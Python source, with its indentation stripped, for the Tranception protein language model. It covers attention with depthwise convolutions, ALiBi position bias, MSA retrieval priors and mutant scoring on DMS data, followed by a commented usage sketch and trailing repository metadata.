self.attn_dropout = nn.Dropout(config.attn_pdrop)
self.resid_dropout = nn.Dropout(config.resid_pdrop)
self.pruned_heads = set()
self.attention_mode=config.attention_mode
if self.attention_mode=="tranception":
assert self.num_heads%4==0, "Invalid number of heads. Tranception requires the number of heads to be a multiple of 4."
self.num_heads_per_kernel_size = self.num_heads // 4
self.query_depthwiseconv = nn.ModuleDict()
self.key_depthwiseconv = nn.ModuleDict()
self.value_depthwiseconv = nn.ModuleDict()
for kernel_idx, kernel in enumerate([3,5,7]):
self.query_depthwiseconv[str(kernel_idx)] = SpatialDepthWiseConvolution(self.head_dim,kernel)
self.key_depthwiseconv[str(kernel_idx)] = SpatialDepthWiseConvolution(self.head_dim,kernel)
self.value_depthwiseconv[str(kernel_idx)] = SpatialDepthWiseConvolution(self.head_dim,kernel)
def prune_heads(self, heads):
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(heads, self.num_heads, self.head_dim, self.pruned_heads)
index_attn = torch.cat([index, index + self.split_size, index + (2 * self.split_size)])
# Prune conv1d layers
self.c_attn = prune_conv1d_layer(self.c_attn, index_attn, dim=1)
self.c_proj = prune_conv1d_layer(self.c_proj, index, dim=0)
# Update hyper params
self.split_size = (self.split_size // self.num_heads) * (self.num_heads - len(heads))
self.num_heads = self.num_heads - len(heads)
self.pruned_heads = self.pruned_heads.union(heads)
def _attn(self, query, key, value, attention_mask=None, head_mask=None, alibi_bias=None):
attn_weights = torch.matmul(query, key.transpose(-1, -2))
if self.scale_attn_weights:
attn_weights = attn_weights / (float(value.size(-1)) ** 0.5)
if not self.is_cross_attention:
# if only "normal" attention layer implements causal mask
query_length, key_length = query.size(-2), key.size(-2)
causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length].bool()
attn_weights = torch.where(causal_mask, attn_weights, self.masked_bias.to(attn_weights.dtype))
if alibi_bias is not None:
attn_weights = attn_weights + alibi_bias[:,:,:attn_weights.size(-1)]
if attention_mask is not None:
# Apply the attention mask
attn_weights = attn_weights + attention_mask
attn_weights = nn.Softmax(dim=-1)(attn_weights)
attn_weights = self.attn_dropout(attn_weights)
# Mask heads if we want to
if head_mask is not None:
attn_weights = attn_weights * head_mask
attn_output = torch.matmul(attn_weights, value)
return attn_output, attn_weights
def _split_heads(self, tensor, num_heads, attn_head_size):
"""
Splits hidden_size dim into attn_head_size and num_heads
"""
new_shape = tensor.size()[:-1] + (num_heads, attn_head_size)
tensor = tensor.view(*new_shape)
return tensor.permute(0, 2, 1, 3) # (batch, head, seq_length, head_features)
def _merge_heads(self, tensor, num_heads, attn_head_size):
"""
Merges attn_head_size dim and num_attn_heads dim into hidden_size
"""
tensor = tensor.permute(0, 2, 1, 3).contiguous()
new_shape = tensor.size()[:-2] + (num_heads * attn_head_size,)
return tensor.view(new_shape)
def forward(
self,
hidden_states,
layer_past=None,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
use_cache=False,
output_attentions=False,
alibi_bias=None,
):
if encoder_hidden_states is not None:
if not hasattr(self, "q_attn"):
raise ValueError(
"If class is used as cross attention, the weights `q_attn` have to be defined. "
"Please make sure to instantiate class with `GPT2Attention(..., is_cross_attention=True)`."
)
query = self.q_attn(hidden_states)
key, value = self.c_attn(encoder_hidden_states).split(self.split_size, dim=2)
attention_mask = encoder_attention_mask
else:
query, key, value = self.c_attn(hidden_states).split(self.split_size, dim=2)
query = self._split_heads(query, self.num_heads, self.head_dim)
key = self._split_heads(key, self.num_heads, self.head_dim)
value = self._split_heads(value, self.num_heads, self.head_dim)
if layer_past is not None:
past_key, past_value = layer_past
key = torch.cat((past_key, key), dim=-2)
value = torch.cat((past_value, value), dim=-2)
if use_cache is True:
present = (key, value)
else:
present = None
if self.attention_mode=="tranception":
# We do not do anything on the first self.num_heads_per_kernel_size heads (kernel =1)
query_list=[query[:,:self.num_heads_per_kernel_size,:,:]]
key_list=[key[:,:self.num_heads_per_kernel_size,:,:]]
value_list=[value[:,:self.num_heads_per_kernel_size,:,:]]
for kernel_idx in range(3):
query_list.append(self.query_depthwiseconv[str(kernel_idx)](query[:,(kernel_idx+1)*self.num_heads_per_kernel_size:(kernel_idx+2)*self.num_heads_per_kernel_size,:,:]))
key_list.append(self.key_depthwiseconv[str(kernel_idx)](key[:,(kernel_idx+1)*self.num_heads_per_kernel_size:(kernel_idx+2)*self.num_heads_per_kernel_size,:,:]))
value_list.append(self.value_depthwiseconv[str(kernel_idx)](value[:,(kernel_idx+1)*self.num_heads_per_kernel_size:(kernel_idx+2)*self.num_heads_per_kernel_size,:,:]))
query=torch.cat(query_list, dim=1)
key=torch.cat(key_list, dim=1)
value=torch.cat(value_list, dim=1)
attn_output, attn_weights = self._attn(query, key, value, attention_mask, head_mask, alibi_bias=alibi_bias)
attn_output = self._merge_heads(attn_output, self.num_heads, self.head_dim)
attn_output = self.c_proj(attn_output)
attn_output = self.resid_dropout(attn_output)
outputs = (attn_output, present)
if output_attentions:
outputs += (attn_weights,)
return outputs # a, present, (attentions)
class TranceptionBlockMLP(nn.Module):
def __init__(self, intermediate_size, config):
super().__init__()
embed_dim = config.hidden_size
self.c_fc = Conv1D(intermediate_size, embed_dim)
self.c_proj = Conv1D(embed_dim, intermediate_size)
self.act = tranception_ACT2FN[config.activation_function]
self.dropout = nn.Dropout(config.resid_pdrop)
def forward(self, hidden_states):
hidden_states = self.c_fc(hidden_states)
hidden_states = self.act(hidden_states)
hidden_states = self.c_proj(hidden_states)
hidden_states = self.dropout(hidden_states)
return hidden_states
class TranceptionBlock(nn.Module):
def __init__(self, config, SDWC_kernel_size=None):
super().__init__()
hidden_size = config.hidden_size
inner_dim = config.n_inner if config.n_inner is not None else 4 * hidden_size
self.ln_1 = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.attn = TranceptionBlockAttention(config, SDWC_kernel_size=SDWC_kernel_size)
self.ln_2 = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
if config.add_cross_attention:
self.crossattention = TranceptionBlockAttention(config, is_cross_attention=True, SDWC_kernel_size=SDWC_kernel_size)
self.ln_cross_attn = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.mlp = TranceptionBlockMLP(inner_dim, config)
def forward(
self,
hidden_states,
layer_past=None,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
use_cache=False,
output_attentions=False,
alibi_bias=None,
):
residual = hidden_states
hidden_states = self.ln_1(hidden_states)
attn_outputs = self.attn(
hidden_states,
layer_past=layer_past,
attention_mask=attention_mask,
head_mask=head_mask,
use_cache=use_cache,
output_attentions=output_attentions,
alibi_bias=alibi_bias,
)
attn_output = attn_outputs[0] # output_attn: a, present, (attentions)
outputs = attn_outputs[1:]
# residual connection
hidden_states = attn_output + residual
if encoder_hidden_states is not None:
# add one self-attention block for cross-attention
if not hasattr(self, "crossattention"):
raise ValueError(
f"If `encoder_hidden_states` are passed, {self} has to be instantiated with "
"cross-attention layers by setting `config.add_cross_attention=True`"
)
residual = hidden_states
hidden_states = self.ln_cross_attn(hidden_states)
cross_attn_outputs = self.crossattention(
hidden_states,
attention_mask=attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
output_attentions=output_attentions,
)
attn_output = cross_attn_outputs[0]
# residual connection
hidden_states = residual + attn_output
outputs = outputs + cross_attn_outputs[2:] # add cross attentions if we output attention weights
residual = hidden_states
hidden_states = self.ln_2(hidden_states)
feed_forward_hidden_states = self.mlp(hidden_states)
# residual connection
hidden_states = residual + feed_forward_hidden_states
if use_cache:
outputs = (hidden_states,) + outputs
else:
outputs = (hidden_states,) + outputs[1:]
return outputs # hidden_states, present, (attentions, cross_attentions)
class TranceptionModel(GPT2PreTrainedModel):
_keys_to_ignore_on_load_missing = ["attn.masked_bias"]
def __init__(self, config):
super().__init__(config)
self.embed_dim = config.hidden_size
self.wte = nn.Embedding(config.vocab_size, self.embed_dim)
self.position_embedding = config.position_embedding if hasattr(config, "position_embedding") else "learned"
if self.position_embedding=="learned":
self.wpe = nn.Embedding(config.max_position_embeddings, self.embed_dim)
self.alibi = None
elif self.position_embedding=="grouped_alibi":
maxpos = config.n_positions
attn_heads = config.n_head
self.slopes = torch.Tensor(get_slopes(attn_heads, mode=self.position_embedding))
#The softmax operation is invariant to translation, and bias functions used are always linear.
alibi = self.slopes.unsqueeze(1).unsqueeze(1) * torch.arange(maxpos).unsqueeze(0).unsqueeze(0).expand(attn_heads, -1, -1)
alibi = alibi.view(attn_heads, 1, maxpos)
self.register_buffer('alibi',alibi)
self.drop = nn.Dropout(config.embd_pdrop)
self.h = nn.ModuleList([TranceptionBlock(config) for _ in range(config.num_hidden_layers)])
self.ln_f = nn.LayerNorm(self.embed_dim, eps=config.layer_norm_epsilon)
self.init_weights()
# Model parallel
self.model_parallel = False
self.device_map = None
self.gradient_checkpointing = False
def parallelize(self, device_map=None, num_cores=None):
self.device_map = (
get_device_map(len(self.h), range(torch.cuda.device_count())) if device_map is None else device_map
)
device_prefix="cuda:"
assert_device_map(self.device_map, len(self.h))
self.model_parallel = True
self.first_device = "cpu" if "cpu" in self.device_map.keys() else device_prefix + str(min(self.device_map.keys()))
self.last_device = device_prefix + str(max(self.device_map.keys()))
self.wte = self.wte.to(self.first_device)
if self.position_embedding=="learned":
self.wpe = self.wpe.to(self.first_device)
for k, v in self.device_map.items():
print("k,v :"+str(k)+","+str(v))
for block in v:
cuda_device = device_prefix + str(k)
self.h[block] = self.h[block].to(cuda_device)
self.ln_f = self.ln_f.to(self.last_device)
def deparallelize(self):
self.model_parallel = False
self.device_map = None
self.first_device = "cpu"
self.last_device = "cpu"
self.wte = self.wte.to("cpu")
if self.position_embedding=="learned":
self.wpe = self.wpe.to("cpu")
for index in range(len(self.h)):
self.h[index] = self.h[index].to("cpu")
self.ln_f = self.ln_f.to("cpu")
torch.cuda.empty_cache()
def get_input_embeddings(self):
return self.wte
def set_input_embeddings(self, new_embeddings):
self.wte = new_embeddings
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer}
"""
for layer, heads in heads_to_prune.items():
self.h[layer].attn.prune_heads(heads)
def forward(
self,
input_ids=None,
past_key_values=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
batch_size = input_ids.shape[0]
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
batch_size = inputs_embeds.shape[0]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
device = input_ids.device if input_ids is not None else inputs_embeds.device
if token_type_ids is not None:
token_type_ids = token_type_ids.view(-1, input_shape[-1])
if position_ids is not None:
position_ids = position_ids.view(-1, input_shape[-1])
if past_key_values is None:
past_length = 0
past_key_values = tuple([None] * len(self.h))
else:
past_length = past_key_values[0][0].size(-2)
if position_ids is None:
position_ids = torch.arange(past_length, input_shape[-1] + past_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).view(-1, input_shape[-1])
# GPT2Attention mask.
if attention_mask is not None:
if batch_size <= 0:
raise ValueError("batch_size has to be defined and > 0")
attention_mask = attention_mask.view(batch_size, -1)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
attention_mask = attention_mask[:, None, None, :]
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
attention_mask = attention_mask.to(dtype=self.dtype) # fp16 compatibility
attention_mask = (1.0 - attention_mask) * -10000.0
# If a 2D or 3D attention mask is provided for the cross-attention
# we need to make broadcastable to [batch_size, num_heads, seq_length, seq_length]
if self.config.add_cross_attention and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_attention_mask = None
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# head_mask has shape n_layer x batch x n_heads x N x N
head_mask = self.get_head_mask(head_mask, self.config.n_layer)
if inputs_embeds is None:
inputs_embeds = self.wte(input_ids)
if self.position_embedding=="learned":
position_embeds = self.wpe(position_ids)
hidden_states = inputs_embeds + position_embeds
else:
hidden_states = inputs_embeds
if token_type_ids is not None:
token_type_embeds = self.wte(token_type_ids)
hidden_states = hidden_states + token_type_embeds
hidden_states = self.drop(hidden_states)
output_shape = input_shape + (hidden_states.size(-1),)
presents = () if use_cache else None
all_self_attentions = () if output_attentions else None
all_cross_attentions = () if output_attentions and self.config.add_cross_attention else None
all_hidden_states = () if output_hidden_states else None
for i, (block, layer_past) in enumerate(zip(self.h, past_key_values)):
# Model parallel
if self.model_parallel:
torch.cuda.set_device(hidden_states.device)
# Ensure layer_past is on same device as hidden_states (might not be correct)
if layer_past is not None:
layer_past = tuple(past_state.to(hidden_states.device) for past_state in layer_past)
# Ensure that attention_mask is always on the same device as hidden_states
if attention_mask is not None:
attention_mask = attention_mask.to(hidden_states.device)
if isinstance(head_mask, torch.Tensor):
head_mask = head_mask.to(hidden_states.device)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if self.gradient_checkpointing and self.training:
if use_cache:
print("`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`...")
use_cache = False
def create_custom_forward(module):
def custom_forward(*inputs):
# None for past_key_value
return module(*inputs, use_cache, output_attentions)
return custom_forward
outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(block),
hidden_states,
None,
attention_mask,
head_mask[i],
encoder_hidden_states,
encoder_attention_mask,
)
else:
outputs = block(
hidden_states,
layer_past=layer_past,
attention_mask=attention_mask,
head_mask=head_mask[i],
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
use_cache=use_cache,
output_attentions=output_attentions,
alibi_bias=self.alibi if hasattr(self, "alibi") else None
)
hidden_states = outputs[0]
if use_cache is True:
presents = presents + (outputs[1],)
if output_attentions:
all_self_attentions = all_self_attentions + (outputs[2 if use_cache else 1],)
if self.config.add_cross_attention:
all_cross_attentions = all_cross_attentions + (outputs[3 if use_cache else 2],)
if self.model_parallel:
device_prefix="cuda:"
for k, v in self.device_map.items():
if i == v[-1] and device_prefix + str(k) != self.last_device:
hidden_states = hidden_states.to(device_prefix + str(k + 1))
hidden_states = self.ln_f(hidden_states)
hidden_states = hidden_states.view(*output_shape)
# Add last hidden state
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(
v
for v in [hidden_states, presents, all_hidden_states, all_self_attentions, all_cross_attentions]
if v is not None
)
return BaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=presents,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
cross_attentions=all_cross_attentions,
)
class TranceptionLMHeadModel(GPT2PreTrainedModel):
_keys_to_ignore_on_load_missing = [r"attn.masked_bias", r"attn.bias", r"lm_head.weight"]
def __init__(self, config):
super().__init__(config)
self.transformer = TranceptionModel(config)
self.lm_head = nn.Linear(config.n_embd, config.vocab_size, bias=False)
self.config = config
self.init_weights()
self.default_model_device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# Model parallel
self.model_parallel = False
self.device_map = None
self.retrieval_aggregation_mode = config.retrieval_aggregation_mode if hasattr(config, "retrieval_aggregation_mode") else None
if self.retrieval_aggregation_mode is not None:
print("Model leverages both autoregressive and retrieval inference")
self.MSA_filename = config.MSA_filename if hasattr(config, "MSA_filename") else False
self.MSA_folder = '/'.join(self.MSA_filename.split(os.sep)[:-1])
self.MSA_name = self.MSA_filename.split(os.sep)[-1]
self.retrieval_inference_weight_LR = config.retrieval_inference_weight if hasattr(config, "retrieval_inference_weight") else 0.6
self.retrieval_inference_weight_RL = config.retrieval_inference_weight if hasattr(config, "retrieval_inference_weight") else 0.6
self.MSA_start=config.MSA_start
self.MSA_end=config.MSA_end
self.full_protein_length = config.full_protein_length if hasattr(config, "full_protein_length") else -1
self.MSA_log_prior = torch.log(torch.tensor(
msa_utils.get_msa_prior(
MSA_data_file=self.MSA_filename,
MSA_weight_file_name=config.MSA_weight_file_name,
retrieval_aggregation_mode=self.retrieval_aggregation_mode,
MSA_start=self.MSA_start,
MSA_end=self.MSA_end,
len_target_seq=self.full_protein_length,
vocab=config.tokenizer.get_vocab(),
verbose=False
)
).float().to(self.default_model_device))
else:
print("Model only uses autoregressive inference")
def parallelize(self, device_map=None, num_cores=None, num_pipelines=1):
self.num_pipelines=num_pipelines
self.device_map = (
get_device_map(len(self.transformer.h), range(torch.cuda.device_count()))
if device_map is None
else device_map
)
assert_device_map(self.device_map, len(self.transformer.h))
self.transformer.parallelize(self.device_map, num_cores=num_cores)
self.lm_head = self.lm_head.to(self.transformer.first_device)
self.model_parallel = True
def deparallelize(self):
self.transformer.deparallelize()
self.transformer = self.transformer.to("cpu")
self.lm_head = self.lm_head.to("cpu")
self.model_parallel = False
torch.cuda.empty_cache()
def get_output_embeddings(self):
return self.lm_head
def set_output_embeddings(self, new_embeddings):
self.lm_head = new_embeddings
def prepare_inputs_for_generation(self, input_ids, past=None, **kwargs):
token_type_ids = kwargs.get("token_type_ids", None)
# only last token for inputs_ids if past is defined in kwargs
if past:
input_ids = input_ids[:, -1].unsqueeze(-1)
if token_type_ids is not None:
token_type_ids = token_type_ids[:, -1].unsqueeze(-1)
attention_mask = kwargs.get("attention_mask", None)
position_ids = kwargs.get("position_ids", None)
if attention_mask is not None and position_ids is None:
# create position_ids on the fly for batch generation
position_ids = attention_mask.long().cumsum(-1) - 1
position_ids.masked_fill_(attention_mask == 0, 1)
if past:
position_ids = position_ids[:, -1].unsqueeze(-1)
else:
position_ids = None
return {
"input_ids": input_ids,
"past_key_values": past,
"use_cache": kwargs.get("use_cache"),
"position_ids": position_ids,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
"flip": kwargs.get("flip", None),
}
def forward(
self,
input_ids=None,
past_key_values=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
flip=None,
start_slice=None,
end_slice=None,
mutated_sequence=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set
``labels = input_ids`` Indices are selected in ``[-100, 0, ..., config.vocab_size]`` All labels set to
``-100`` are ignored (masked), the loss is only computed for labels in ``[0, ..., config.vocab_size]``
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
past_key_values=past_key_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict
)
hidden_states = transformer_outputs[0]
# Set device for model parallelism
if self.model_parallel:
torch.cuda.set_device(self.transformer.first_device)
hidden_states = hidden_states.to(self.lm_head.weight.device)
self.MSA_log_prior = self.MSA_log_prior.to(self.lm_head.weight.device)
lm_logits = self.lm_head(hidden_states)
loss = None
fused_shift_log_probas = None
if labels is not None:
# Shift so that tokens < n predict n
shift_logits = lm_logits[..., :-1, :].contiguous()
shift_labels = labels[..., 1:].contiguous()
if self.retrieval_aggregation_mode is not None:
batch_size = input_ids.size(0)
if self.retrieval_aggregation_mode=="aggregate_indel":
assert batch_size==1, "Aggregate indel is only supported for batch size of 1"
truncated_sequence_text = mutated_sequence[0][start_slice[0]:end_slice[0]]
if len(truncated_sequence_text)!=shift_logits.shape[1]-1: # shift_logits only has one extra token compared to truncated_sequence_text (the BOS token)
print("Tokenization error -- seq length: {} and shift_logits length - 1 : {}".format(len(mutated_sequence),shift_logits.shape[1]-1))
MSA_log_prior, MSA_start, MSA_end = msa_utils.update_retrieved_MSA_log_prior_indel(self, self.MSA_log_prior, self.MSA_start, self.MSA_end, mutated_sequence[0])
elif self.retrieval_aggregation_mode=="aggregate_substitution":
MSA_log_prior=self.MSA_log_prior
MSA_start=self.MSA_start
MSA_end=self.MSA_end
shift_log_probas = torch.log_softmax(shift_logits,dim=-1)
fused_shift_log_probas = shift_log_probas.clone()
if flip is None:
flip = torch.zeros(batch_size).to(fused_shift_log_probas.device)
flip = flip > 0
for seq_index in range(batch_size):
min_prior_slice = max(start_slice[seq_index], MSA_start)
max_prior_slice = min(end_slice[seq_index], MSA_end)
if max_prior_slice <= min_prior_slice:
print("Non overlapping region detected: min_prior_slice {} and max_prior_slice {}".format(min_prior_slice,max_prior_slice))
continue
slice_prior = MSA_log_prior[min_prior_slice:max_prior_slice,:].to(fused_shift_log_probas.device)
if flip[seq_index]:
slice_prior = torch.flip(slice_prior,dims=(0,))
min_logits_slice = max(0,end_slice[seq_index]-MSA_end)
max_logits_slice = min_logits_slice + (max_prior_slice-min_prior_slice)
fused_shift_log_probas[seq_index,min_logits_slice:max_logits_slice,:] = (1-self.retrieval_inference_weight_RL)*shift_log_probas[seq_index,min_logits_slice:max_logits_slice,:] + self.retrieval_inference_weight_RL*slice_prior
else:
min_logits_slice = max(0, MSA_start-start_slice[seq_index])
max_logits_slice = min_logits_slice + (max_prior_slice-min_prior_slice)
fused_shift_log_probas[seq_index,min_logits_slice:max_logits_slice,:] = (1-self.retrieval_inference_weight_LR)*shift_log_probas[seq_index,min_logits_slice:max_logits_slice,:] + self.retrieval_inference_weight_LR*slice_prior
if self.retrieval_aggregation_mode=="aggregate_indel":
try:
# If a given residue column is an added zero-column, then we overwrite the prior fusion and only predict based on the autoregressive transformer inference mode.
inserted_retrieval_positions = [True if slice_prior[i].sum()==0 else False for i in range(len(slice_prior))]+[True] #Last True is for the end of sentence token
fused_shift_log_probas[:,inserted_retrieval_positions,:]=shift_log_probas[:,inserted_retrieval_positions,:]
except:
print("Error when adding zero column(s) to account for insertion mutations.")
loss_fct = NLLLoss(reduction='none')
loss = loss_fct(input=fused_shift_log_probas.view(-1, fused_shift_log_probas.size(-1)), target=shift_labels.view(-1)).view(fused_shift_log_probas.shape[0],fused_shift_log_probas.shape[1])
mask = attention_mask[..., 1:].float()
mask[mask==0]=float('nan')
loss *= mask
loss = nanmean(loss, dim=1).mean()
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1))
if not return_dict:
output = (lm_logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return TranceptionCausalLMOutputWithCrossAttentions(
loss=loss,
logits=lm_logits,
past_key_values=transformer_outputs.past_key_values,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
cross_attentions=transformer_outputs.cross_attentions,
fused_shift_log_probas=fused_shift_log_probas
)
@staticmethod
def _reorder_cache(past: Tuple[Tuple[torch.Tensor]], beam_idx: torch.Tensor) -> Tuple[Tuple[torch.Tensor]]:
"""
This function is used to re-order the :obj:`past_key_values` cache if
:meth:`~transformers.PreTrainedModel.beam_search` or :meth:`~transformers.PreTrainedModel.beam_sample` is
called. This is required to match :obj:`past_key_values` with the correct beam_idx at every generation step.
"""
return tuple(
tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past)
for layer_past in past
)
def score_mutants(self, DMS_data, target_seq=None, scoring_mirror=True, batch_size_inference=10, num_workers=10, indel_mode=False):
"""
Method to score mutants in an input DMS file.
DMS_data: (dataframe) Dataframe containing the list of mutated sequences for scoring.
target_seq: (string) Full reference sequence (wild type) that is mutated in the DMS assay. If not None, returned scores are delta log likelihood wrt that sequence.
scoring_mirror: (bool) Whether to score mutated sequences from both directions (Left->Right and Right->Left).
batch_size_inference: (int) Batch size for scoring.
num_workers: (int) Number of workers to be used in the data loader.
indel_mode: (bool) Flag to be used when scoring insertions and deletions. Otherwise assumes substitutions.
"""
df = DMS_data.copy()
if ('mutated_sequence' not in df) and (not indel_mode): df['mutated_sequence'] = df['mutant'].apply(lambda x: scoring_utils.get_mutated_sequence(target_seq, x))
assert ('mutated_sequence' in df), "DMS file to score does not have mutated_sequence column"
#if 'mutant' not in df: df['mutant'] = df['mutated_sequence'] #if mutant not in DMS file we default to mutated_sequence
if 'DMS_score' in df: del df['DMS_score']
if 'DMS_score_bin' in df: del df['DMS_score_bin']
if target_seq is not None:
df_left_to_right_slices = scoring_utils.get_sequence_slices(df, target_seq=target_seq, model_context_len = self.config.n_ctx - 2, indel_mode=indel_mode, scoring_window=self.config.scoring_window)
else:
df_left_to_right_slices = scoring_utils.get_sequence_slices(df, target_seq=list(df['mutated_sequence'])[0], model_context_len = self.config.n_ctx - 2, indel_mode=indel_mode, scoring_window='sliding')
print("Scoring sequences from left to right")
scores_L_to_R = scoring_utils.get_tranception_scores_mutated_sequences(model=self, mutated_sequence_df=df_left_to_right_slices, batch_size_inference=batch_size_inference, score_var_name='avg_score_L_to_R', target_seq=target_seq, num_workers=num_workers, indel_mode=indel_mode)
if scoring_mirror:
print("Scoring sequences from right to left")
df_right_to_left_slices = df_left_to_right_slices.copy()
df_right_to_left_slices['sliced_mutated_sequence'] = df_right_to_left_slices['sliced_mutated_sequence'].apply(lambda x: x[::-1])
scores_R_to_L = scoring_utils.get_tranception_scores_mutated_sequences(model=self, mutated_sequence_df=df_right_to_left_slices, batch_size_inference=batch_size_inference, score_var_name='avg_score_R_to_L', target_seq=target_seq, num_workers=num_workers, reverse=True, indel_mode=indel_mode)
all_scores = pd.merge(scores_L_to_R, scores_R_to_L, on='mutated_sequence', how='left', suffixes=('','_R_to_L'))
all_scores['avg_score'] = (all_scores['avg_score_L_to_R'] + all_scores['avg_score_R_to_L']) / 2.0
else:
all_scores = scores_L_to_R
all_scores['avg_score'] = all_scores['avg_score_L_to_R']
#By design "get_tranception_scores_mutated_sequences" drops the WT from the output. We add it back if that was one of the sequences to score in the DMS (score=0 by definition)
        if target_seq in df.mutated_sequence.values:
if scoring_mirror:
wt_row = pd.DataFrame([[target_seq,0,0,0]], columns=['mutated_sequence','avg_score_L_to_R','avg_score_R_to_L','avg_score'])
else:
wt_row = pd.DataFrame([[target_seq,0,0]], columns=['mutated_sequence','avg_score_L_to_R','avg_score'])
all_scores = pd.concat([all_scores,wt_row], ignore_index=True)
return all_scores
def encode_batch(self, protein_sequence, sequence_name="sliced_mutated_sequence"):
"""
Method to process an input AA sequence batch (protein_sequence) and return a tokenized sequence (via the tokenizer associated to the model).
"""
protein_sequence[sequence_name] = scoring_utils.sequence_replace(sequences=protein_sequence[sequence_name], char_to_replace='X', char_replacements='ACDEFGHIKLMNPQRSTVWY')
protein_sequence[sequence_name] = scoring_utils.sequence_replace(sequences=protein_sequence[sequence_name], char_to_replace='B', char_replacements='DN')
protein_sequence[sequence_name] = scoring_utils.sequence_replace(sequences=protein_sequence[sequence_name], char_to_replace='J', char_replacements='IL')
protein_sequence[sequence_name] = scoring_utils.sequence_replace(sequences=protein_sequence[sequence_name], char_to_replace='Z', char_replacements='EQ')
return self.config.tokenizer(list(protein_sequence[sequence_name]), add_special_tokens=True, truncation=True, padding=True, max_length=self.config.n_ctx)
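# --- Hedged usage sketch (illustrative only; not part of the original file) ---
# Why: the score_mutants docstring above describes the scoring API; this sketch shows
# one way it might be called. Assumptions (not from the source): `model` is an
# already-instantiated instance of the model class above with its config/tokenizer
# loaded, and the toy sequences below are made up for illustration.
#
# import pandas as pd
# dms_df = pd.DataFrame({"mutated_sequence": ["MKTAYIAKQR", "MATAYIAKQR"]})
# scores = model.score_mutants(
#     DMS_data=dms_df,
#     target_seq="MKTAYIAKQR",      # wild-type reference; scores become deltas vs. this
#     scoring_mirror=True,          # score both left-to-right and right-to-left
#     batch_size_inference=8,
#     num_workers=2,
#     indel_mode=False,
# )
# print(scores[["mutated_sequence", "avg_score"]])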
|
0aee10042593f709c4e3461b8aca202760061359
|
97d7455fbaa56813e97cf601e4a23786d47c2e2c
|
/tests/api/test_resources.py
|
49968544987a62932eb6e7798b29cc74b73255fb
|
[
"Apache-2.0"
] |
permissive
|
Yelp/paasta
|
9138fbb0beaaa6146520c1483144679f9d5d4941
|
6fafc7c86073f136e64b959b963994be3d6160ab
|
refs/heads/master
| 2023-08-17T00:00:47.610727
| 2023-08-10T21:40:26
| 2023-08-10T21:40:26
| 44,998,824
| 1,805
| 291
|
Apache-2.0
| 2023-09-13T20:40:04
| 2015-10-26T21:35:53
|
Python
|
UTF-8
|
Python
| false
| false
| 5,912
|
